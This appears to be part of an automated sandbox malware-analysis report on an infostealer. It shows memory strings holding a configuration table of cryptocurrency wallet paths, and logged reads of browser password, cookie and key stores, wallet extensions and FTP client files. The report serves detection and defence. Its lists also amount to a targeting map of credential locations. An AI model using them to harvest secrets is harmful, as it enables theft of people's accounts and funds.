Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: seed.seco
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
